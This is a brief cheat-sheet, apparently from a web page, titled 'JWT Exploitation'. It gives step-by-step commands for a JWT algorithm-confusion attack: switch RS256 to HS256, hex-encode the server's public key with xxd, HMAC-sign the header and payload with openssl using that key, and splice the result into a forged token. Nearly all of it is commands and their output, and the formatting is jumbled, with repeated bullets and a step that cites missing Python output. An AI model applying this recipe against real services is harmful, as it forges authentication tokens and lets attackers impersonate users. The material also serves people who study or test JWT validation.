JWT Exploitation
- Grab The Token
- Separated By
. (Dot): HEADER:PAYLOAD:SECRET
- Separated By
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjQ0Mjc4MTM1LCJleHAiOjE2NDQyNzgyNTUsImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ.E-PuCJEhs2zp5a_NEsL-boVJ_pbtmOIb_t-YFQtcPFs2ysQ-89-91rlapGjn8AYtLegScNx0Lz5QgfCizjZ_SNN8hQc-UVX1mqcI3-1O3FJ_VEtUqsV5Gx9dqD9Sqk8bM1pC8yP9H32HoUASLL_wKpWr8tblV5DAIwlfnXqxiWSNzqahqPIleATyDUXnpaQN6yeCfLFZ_5vNHN0TwhbmuL7PIpjShVBJh5-5Fqgtr-g6SRLPoxPZgxwQNdhs0ZfAlvHBUi99ZOVvDnxQOZ_PJXv_upyGS1UBV9cxXC_UZVh2mBiQ7IlvgWJvHtT3AJ9u16Pytc1lgc6T4kq0BTBuJw
- Change Token Algorithm:
RS256 >> HS256
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjQ0Mjc4MTM1LCJleHAiOjE2NDQyNzgyNTUsImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ.tgE1GJAUwr4I480BIcPJrD1DJi_EcmLMAnVftRh-ZFM
{
"typ": "JWT",
"alg": "HS256"
}
- Convert Public Key to HEX so OPENSSL Will Use It:
cat Public.pem | xxd -p | tr -d "\\n" > Public.xxd
- Public PEM
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqi8TnuQBGXOGx/Lfn4JF
NYOH2V1qemfs83stWc1ZBQFCQAZmUr/sgbPypYzy229pFl6bGeqpiRHrSufHug7c
1LCyalyUEP+OzeqbEhSSuUss/XyfzybIusbqIDEQJ+Yex3CdgwC/hAF3xptV/2t+
H6y0Gdh1weVKRM8+QaeWUxMGOgzJYAlUcRAP5dRkEOUtSKHBFOFhEwNBXrfLd76f
ZXPNgyN0TzNLQjPQOy/tJ/VFq8CQGE4/K5ElRSDlj4kswxonWXYAUVxnqRN1LGHw
2G5QRE2D13sKHCC8ZrZXJzj67Hrq5h2SADKzVzhA8AW3WZlPLrlFT3t1+iZ6m+aF
KwIDAQAB
-----END PUBLIC KEY-----
- Public XXD
2d2d2d2d2d424547494e205055424c4943204b45592d2d2d2d2d0a4d494942496a414e42676b71686b6947397730424151454641414f43415138414d49494243674b4341514541716938546e75514247584f47782f4c666e344a460a4e594f4832563171656d6673383373745763315a4251464351415a6d55722f736762507970597a7932323970466c3662476571706952487253756648756737630a314c4379616c795545502b4f7a65716245685353755573732f5879667a79624975736271494445514a2b5965783343646777432f68414633787074562f32742b0a48367930476468317765564b524d382b5161655755784d474f677a4a59416c55635241503564526b454f5574534b4842464f466845774e425872664c643736660a5a58504e67794e30547a4e4c516a50514f792f744a2f5646713843514745342f4b35456c5253446c6a346b7377786f6e575859415556786e71524e314c4748770a32473551524532443133734b484343385a725a584a7a6a36374872713568325341444b7a567a684138415733575a6c504c726c46543374312b695a366d2b61460a4b774944415141420a2d2d2d2d2d454e44205055424c4943204b45592d2d2d2d2d0a
- Use OPENSSL to Sign that as a valid HS256 Key:
- Use Only: HEADER:PAYLOAD in the
echo
- Use Only: HEADER:PAYLOAD in the
echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjQ0Mjc4MTM1LCJleHAiOjE2NDQyNzgyNTUsImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey:`cat Public.xxd`
(stdin)= 9ac5277e1c579157f6c572ff710d3b4ada346317510a632170b1d5212703f465
- Decode HEX to Binary Data, and Reencode it in BASE64:
- Input the stdin from the
echo:opensslOutput HEADER:PAYLOAD with the SECRET frompythonOutput.
- Input the stdin from the
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJQYXJhZG94IiwiaWF0IjoxNjQ0Mjc4MTM1LCJleHAiOjE2NDQyNzgyNTUsImRhdGEiOnsicGluZ3UiOiJub290cyJ9fQ. 🠔 msUnfhxXkVf2xXL_cQ07Sto0YxdRCmMhcLHVIScD9GU